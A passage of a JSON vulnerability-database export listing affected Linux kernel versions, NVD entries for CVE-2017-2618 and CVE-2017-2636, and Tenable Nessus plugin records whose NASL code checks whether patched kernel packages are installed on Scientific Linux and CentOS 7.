"cpe:/o:linux:linux_kernel:2.5.50", "cpe:/o:linux:linux_kernel:3.4.63", "cpe:/o:linux:linux_kernel:2.6.27.9", "cpe:/o:linux:linux_kernel:2.1.107", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:2.6.28.4", "cpe:/o:linux:linux_kernel:2.6.33:rc6", "cpe:/o:linux:linux_kernel:2.3.99:pre5", "cpe:/o:linux:linux_kernel:3.12.40", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:2.1.126", "cpe:/o:linux:linux_kernel:3.4.101", "cpe:/o:linux:linux_kernel:3.12.4", "cpe:/o:linux:linux_kernel:4.4.127", "cpe:/o:linux:linux_kernel:4.9.4", "cpe:/o:linux:linux_kernel:3.5", "cpe:/o:linux:linux_kernel:2.3.31", "cpe:/o:linux:linux_kernel:2.5.54", "cpe:/o:linux:linux_kernel:3.10.62", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:linux:linux_kernel:4.4.59", "cpe:/o:linux:linux_kernel:3.14.19", "cpe:/o:linux:linux_kernel:2.6.36:rc4", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:4.6.3", "cpe:/o:linux:linux_kernel:2.6.10:rc1", "cpe:/o:linux:linux_kernel:2.6.17:rc1", "cpe:/o:linux:linux_kernel:4.1:rc2", "cpe:/o:linux:linux_kernel:3.10.32", "cpe:/o:linux:linux_kernel:3.12.50", "cpe:/o:linux:linux_kernel:2.6.39:rc4", "cpe:/o:linux:linux_kernel:2.2.21:rc1", "cpe:/o:linux:linux_kernel:2.4.34.1", "cpe:/o:linux:linux_kernel:3.14.10", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:2.6.14.6", "cpe:/o:linux:linux_kernel:2.6.14:rc2", "cpe:/o:linux:linux_kernel:4.4.96", "cpe:/o:linux:linux_kernel:4.4.68", "cpe:/o:linux:linux_kernel:2.6.18.8", "cpe:/o:linux:linux_kernel:2.1.99", "cpe:/o:linux:linux_kernel:3.4.43", "cpe:/o:linux:linux_kernel:-", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.14.61", "cpe:/o:linux:linux_kernel:2.6.21:git2", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:2.6.16.35", "cpe:/o:linux:linux_kernel:3.14.48", "cpe:/o:linux:linux_kernel:2.2.21:rc3", "cpe:/o:linux:linux_kernel:4.2.3", "cpe:/o:linux:linux_kernel:2.2.22:rc1", "cpe:/o:linux:linux_kernel:2.6.21:git6", "cpe:/o:linux:linux_kernel:3.4.58", "cpe:/o:linux:linux_kernel:3.9.10::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.4.73", "cpe:/o:linux:linux_kernel:2.6.29:rc3", "cpe:/o:linux:linux_kernel:3.18.64", "cpe:/o:linux:linux_kernel:4.0.1", "cpe:/o:linux:linux_kernel:2.6.37:rc6", "cpe:/o:linux:linux_kernel:2.4.0:test11", "cpe:/o:linux:linux_kernel:4.3:rc6", "cpe:/o:linux:linux_kernel:3.4.51", "cpe:/o:linux:linux_kernel:3.14.44", "cpe:/o:linux:linux_kernel:4.0.3", "cpe:/o:linux:linux_kernel:3.0:rc3", "cpe:/o:linux:linux_kernel:2.5.69", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.15:rc3", "cpe:/o:linux:linux_kernel:2.6.20.13", "cpe:/o:linux:linux_kernel:2.6.16:rc1", "cpe:/o:linux:linux_kernel:4.3:rc4", "cpe:/o:linux:linux_kernel:2.6.23:rc2", "cpe:/o:linux:linux_kernel:4.4.98", "cpe:/o:linux:linux_kernel:2.0.2", "cpe:/o:linux:linux_kernel:2.6.35.12", "cpe:/o:linux:linux_kernel:2.5.46", "cpe:/o:linux:linux_kernel:4.1.42", "cpe:/o:linux:linux_kernel:3.10.76", "cpe:/o:linux:linux_kernel:3.18.20", "cpe:/o:linux:linux_kernel:2.6.35:rc3", "cpe:/o:linux:linux_kernel:2.4.19:pre6", "cpe:/o:linux:linux_kernel:2.6.27.10", "cpe:/o:linux:linux_kernel:2.1.116", "cpe:/o:linux:linux_kernel:3.14.5", "cpe:/o:linux:linux_kernel:2.0.13", "cpe:/o:linux:linux_kernel:4.4.136", "cpe:/o:linux:linux_kernel:2.6.16.11", "cpe:/o:linux:linux_kernel:3.0:rc5", "cpe:/o:linux:linux_kernel:2.6.32.15", "cpe:/o:linux:linux_kernel:2.3.99", "cpe:/o:linux:linux_kernel:4.4.22", "cpe:/o:linux:linux_kernel:2.6.31:rc6", "cpe:/o:linux:linux_kernel:2.6.24:rc2", "cpe:/o:linux:linux_kernel:2.6.11:rc5", "cpe:/o:linux:linux_kernel:2.6.28.1", "cpe:/o:linux:linux_kernel:2.5.6", "cpe:/o:linux:linux_kernel:3.0.81", "cpe:/o:linux:linux_kernel:2.1.78", "cpe:/o:linux:linux_kernel:3.18.11", "cpe:/o:linux:linux_kernel:4.1.1", "cpe:/o:linux:linux_kernel:2.5.67", "cpe:/o:linux:linux_kernel:4.3:rc1", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:2.6.28:rc7", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:2.2.8", "cpe:/o:linux:linux_kernel:2.6.35.1", "cpe:/o:linux:linux_kernel:3.14.52", "cpe:/o:linux:linux_kernel:4.3.2", "cpe:/o:linux:linux_kernel:2.6.39:rc3", "cpe:/o:linux:linux_kernel:2.1.94", "cpe:/o:linux:linux_kernel:2.6.27.41", "cpe:/o:linux:linux_kernel:2.6.32.54", "cpe:/o:linux:linux_kernel:2.6.25:rc9", "cpe:/o:linux:linux_kernel:3.9:rc2", "cpe:/o:linux:linux_kernel:4.4.12", "cpe:/o:linux:linux_kernel:2.6.31.5", "cpe:/o:linux:linux_kernel:2.6.27.49", "cpe:/o:linux:linux_kernel:2.2.22:rc3", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:2.6.20.10", "cpe:/o:linux:linux_kernel:4.8.14", "cpe:/o:linux:linux_kernel:2.6.7:rc1", "cpe:/o:linux:linux_kernel:2.1.118", "cpe:/o:linux:linux_kernel:3.0.90", "cpe:/o:linux:linux_kernel:2.1.104", "cpe:/o:linux:linux_kernel:2.6.17.5", "cpe:/o:linux:linux_kernel:2.4.19:pre2", "cpe:/o:linux:linux_kernel:3.13.8", "cpe:/o:linux:linux_kernel:2.6.30.8", "cpe:/o:linux:linux_kernel:2.6.37:rc7", "cpe:/o:linux:linux_kernel:2.6.33.20", "cpe:/o:linux:linux_kernel:2.1.132", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:2.6.16.23", "cpe:/o:linux:linux_kernel:4.3.5", "cpe:/o:linux:linux_kernel:2.4.33", "cpe:/o:linux:linux_kernel:4.4.65", "cpe:/o:linux:linux_kernel:2.6.23.3", "cpe:/o:linux:linux_kernel:2.4.34:rc3", "cpe:/o:linux:linux_kernel:3.4.110", "cpe:/o:linux:linux_kernel:3.10.57", "cpe:/o:linux:linux_kernel:2.6.25.10", "cpe:/o:linux:linux_kernel:2.4.0:test10", "cpe:/o:linux:linux_kernel:4.4.42", "cpe:/o:linux:linux_kernel:2.6.13.3", "cpe:/o:linux:linux_kernel:4.4.78", "cpe:/o:linux:linux_kernel:3.9.4::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.2.76", "cpe:/o:linux:linux_kernel:4.4.107", "cpe:/o:linux:linux_kernel:2.1.83", "cpe:/o:linux:linux_kernel:3.14.63", "cpe:/o:linux:linux_kernel:4.1.25", "cpe:/o:linux:linux_kernel:4.9:rc3", "cpe:/o:linux:linux_kernel:2.2.23:rc1", "cpe:/o:linux:linux_kernel:2.6.22.2", "cpe:/o:linux:linux_kernel:3.4.77", "cpe:/o:linux:linux_kernel:2.0.18", "cpe:/o:linux:linux_kernel:2.6.18:rc1", "cpe:/o:linux:linux_kernel:2.6.21.2", "cpe:/o:linux:linux_kernel:2.6.18:rc4", "cpe:/o:linux:linux_kernel:2.6.39:rc7", "cpe:/o:linux:linux_kernel:2.6.38:rc6", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:2.6.24:rc5", "cpe:/o:linux:linux_kernel:2.1.74", "cpe:/o:linux:linux_kernel:3.14.49", "cpe:/o:linux:linux_kernel:2.6.38.7", "cpe:/o:linux:linux_kernel:3.2.65", "cpe:/o:linux:linux_kernel:2.6.27.55", "cpe:/o:linux:linux_kernel:2.6.16.13", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:3.0.86", "cpe:/o:linux:linux_kernel:2.6.32.53", "cpe:/o:linux:linux_kernel:4.0.0", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:2.6.9:rc4", "cpe:/o:linux:linux_kernel:2.6.20:rc6", "cpe:/o:linux:linux_kernel:2.6.32.41", "cpe:/o:linux:linux_kernel:4.4.130", "cpe:/o:linux:linux_kernel:3.10.64", "cpe:/o:linux:linux_kernel:3.18.4", "cpe:/o:linux:linux_kernel:4.7.5", "cpe:/o:linux:linux_kernel:2.6.33.17", "cpe:/o:linux:linux_kernel:2.2.22", "cpe:/o:linux:linux_kernel:2.6.29:rc1", "cpe:/o:linux:linux_kernel:3.10.22", "cpe:/o:linux:linux_kernel:2.5.28", "cpe:/o:linux:linux_kernel:2.4.24", "cpe:/o:linux:linux_kernel:2.6.25.8", "cpe:/o:linux:linux_kernel:2.6.23:rc6", "cpe:/o:linux:linux_kernel:2.6.22.6", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.17", "cpe:/o:linux:linux_kernel:3.18.44", "cpe:/o:linux:linux_kernel:4.8", "cpe:/o:linux:linux_kernel:3.1:rc3", "cpe:/o:linux:linux_kernel:2.1.43", "cpe:/o:linux:linux_kernel:2.6.16.43", "cpe:/o:linux:linux_kernel:2.6.37:rc5", "cpe:/o:linux:linux_kernel:2.6.16.62", "cpe:/o:linux:linux_kernel:4.4.113", "cpe:/o:linux:linux_kernel:3.9.2::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.14.13", "cpe:/o:linux:linux_kernel:3.10.84", "cpe:/o:linux:linux_kernel:2.5.55", "cpe:/o:linux:linux_kernel:2.6.31.12", "cpe:/o:linux:linux_kernel:2.3.0", "cpe:/o:linux:linux_kernel:2.3.99:pre1", "cpe:/o:linux:linux_kernel:3.14.64", "cpe:/o:linux:linux_kernel:2.6.27:rc3", "cpe:/o:linux:linux_kernel:4.1:rc3", "cpe:/o:linux:linux_kernel:3.15.6", "cpe:/o:linux:linux_kernel:2.4.33.1", "cpe:/o:linux:linux_kernel:2.6.31.13", "cpe:/o:linux:linux_kernel:2.6.34:rc4", "cpe:/o:linux:linux_kernel:3.11.10", "cpe:/o:linux:linux_kernel:3.12.9"], "id": "CVE-2017-2618", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2618", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T11:52:58", "references": ["https://access.redhat.com/errata/RHSA-2017:1232", "https://access.redhat.com/errata/RHSA-2017:1125", "http://www.openwall.com/lists/oss-security/2017/03/07/6", "https://access.redhat.com/errata/RHSA-2017:0931", "https://access.redhat.com/errata/RHSA-2017:1233", "http://www.securitytracker.com/id/1037963", "https://access.redhat.com/errata/RHSA-2017:1126", "http://www.securityfocus.com/bid/96732", "https://a13xp0p0v.github.io/2017/03/24/CVE-2017-2636.html", "https://access.redhat.com/errata/RHSA-2017:0933", "http://www.debian.org/security/2017/dsa-3804", "https://access.redhat.com/errata/RHSA-2017:0892", "https://access.redhat.com/errata/RHSA-2017:0986", "https://access.redhat.com/errata/RHSA-2017:1488", "https://access.redhat.com/errata/RHSA-2017:0932", "https://bugzilla.redhat.com/show_bug.cgi?id=1428319"], "edition": 7, "description": "Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.", "reporter": "NVD", "published": "2017-03-07T17:59:00", "title": "CVE-2017-2636", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-2636"], "scanner": [], "cpe": ["cpe:/o:linux:linux_kernel:4.10.1"], "modified": "2018-01-04T21:31:30", "id": "CVE-2017-2636", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2636", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:26:38", "references": ["http://www.nessus.org/u?a9bdeb1c"], "pluginID": "99351", "description": "Security Fix(es) :\n\n - A race condition flaw was found in the N_HLDC Linux\n kernel driver when accessing n_hdlc.tbuf list that can\n lead to double free. A local, unprivileged user able to\n set the HDLC line discipline on the tty device could use\n this flaw to increase their privileges on the system.\n (CVE-2017-2636, Important)\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted RSA\n key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650, Moderate)\n\n - A flaw was found in the Linux kernel's implementation of\n setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non- namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793, Moderate)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618, Moderate)", "edition": 7, "reporter": "Tenable", "published": "2017-04-13T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-12-27T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170412_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99351", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99351);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/12/27 10:05:37\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A race condition flaw was found in the N_HLDC Linux\n kernel driver when accessing n_hdlc.tbuf list that can\n lead to double free. A local, unprivileged user able to\n set the HDLC line discipline on the tty device could use\n this flaw to increase their privileges on the system.\n (CVE-2017-2636, Important)\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted RSA\n key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650, Moderate)\n\n - A flaw was found in the Linux kernel's implementation of\n setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non- namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793, Moderate)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618, Moderate)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1704&L=scientific-linux-errata&F=&S=&P=6692\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9bdeb1c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.16.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:26:39", "references": ["http://www.nessus.org/u?2af98135"], "pluginID": "99383", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).", "edition": 12, "reporter": "Tenable", "published": "2017-04-14T00:00:00", "title": "CentOS 7 : kernel (CESA-2017:0933)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0933 and \n# CentOS Errata and Security Advisory 2017:0933 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99383);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:32\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_xref(name:\"RHSA\", value:\"2017:0933\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2017:0933)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2af98135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n 